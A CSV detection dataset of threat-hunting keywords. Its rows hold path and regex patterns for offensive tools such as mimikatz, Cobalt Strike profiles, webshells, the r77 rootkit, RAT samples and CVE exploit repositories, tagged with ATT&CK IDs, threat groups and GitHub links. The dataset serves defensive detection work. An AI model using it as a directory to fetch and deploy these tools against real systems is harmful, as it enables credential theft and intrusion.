"*/qconn-exec.nse*",".{0,1000}\/qconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10114"
"*/QHpix/CVE-2021-44521*",".{0,1000}\/QHpix\/CVE\-2021\-44521.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","10115"
"*/qscan.nse*",".{0,1000}\/qscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10117"
"*/quake1-info.nse*",".{0,1000}\/quake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10118"
"*/quake3-info.nse*",".{0,1000}\/quake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10119"
"*/quake3-master-getservers.nse*",".{0,1000}\/quake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10120"
"*/quantloader.profile*",".{0,1000}\/quantloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10121"
"*/quarkspwdump.git*",".{0,1000}\/quarkspwdump\.git.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","10122"
"*/quarkspwdump.git*",".{0,1000}\/quarkspwdump\.git.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","10123"
"*/Quasar.exe*",".{0,1000}\/Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10124"
"*/quic-go/quic-go/http3*",".{0,1000}\/quic\-go\/quic\-go\/http3.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10128"
"*/quickcrack.py*",".{0,1000}\/quickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","10131"
"*/QuickViewAD.ps1*",".{0,1000}\/QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","10132"
"*/quicserver.exe*",".{0,1000}\/quicserver\.exe.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","10133"
"*/quiet-riot.git*",".{0,1000}\/quiet\-riot\.git.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10134"
"*/r00t-3xp10it*",".{0,1000}\/r00t\-3xp10it.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","10135"
"*/r57shell.php*",".{0,1000}\/r57shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10136"
"*/r57shell127.php*",".{0,1000}\/r57shell127\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10137"
"*/r77-rootkit.git*",".{0,1000}\/r77\-rootkit\.git.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10138"
"*/r77-x64.dll*",".{0,1000}\/r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10139"
"*/r77-x86.dll*",".{0,1000}\/r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10140"
"*/raceabrt.c*",".{0,1000}\/raceabrt\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","10141"
"*/RagingRotator.git*",".{0,1000}\/RagingRotator\.git.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","10146"
"*/RagingRotator.go*",".{0,1000}\/RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","10147"
"*/rahul1406/cve-2022-0847dirtypipe-exploit*",".{0,1000}\/rahul1406\/cve\-2022\-0847dirtypipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10148"
"*/RAI.git*",".{0,1000}\/RAI\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","10149"
"*/rakjong/mimikatz_bypassAV/*",".{0,1000}\/rakjong\/mimikatz_bypassAV\/.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","10150"
"*/ramnit.profile*",".{0,1000}\/ramnit\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10151"
"*/random-robbie/cve-2022-23131-exp*",".{0,1000}\/random\-robbie\/cve\-2022\-23131\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","10152"
"*/Ransomware.dll*",".{0,1000}\/Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","10153"
"*/Ransomware.exe*",".{0,1000}\/Ransomware\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","10154"
"*/Ransomware.pdb*",".{0,1000}\/Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","10155"
"*/rarce.py*",".{0,1000}\/rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","10156"
"*/rasman.exe*",".{0,1000}\/rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","10157"
"*/RasmanPotato*",".{0,1000}\/RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","10158"
"*/Rat_Generator*",".{0,1000}\/Rat_Generator.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","10159"
"*/ratankba.profile*",".{0,1000}\/ratankba\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10160"
"*/RATC.exe*",".{0,1000}\/RATC\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10161"
"*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10162"
"*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10163"
"*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10164"
"*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10165"
"*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10166"
"*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10167"
"*/RationalLove.c",".{0,1000}\/RationalLove\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10176"
"*/ratnow.exe*",".{0,1000}\/ratnow\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10177"
"*/rats/badrat_cs/*",".{0,1000}\/rats\/badrat_cs\/.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","10178"
"*/rattler.git*",".{0,1000}\/rattler\.git.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10179"
"*/Rattler_32.exe*",".{0,1000}\/Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10180"
"*/Rattler_x64.exe*",".{0,1000}\/Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10181"
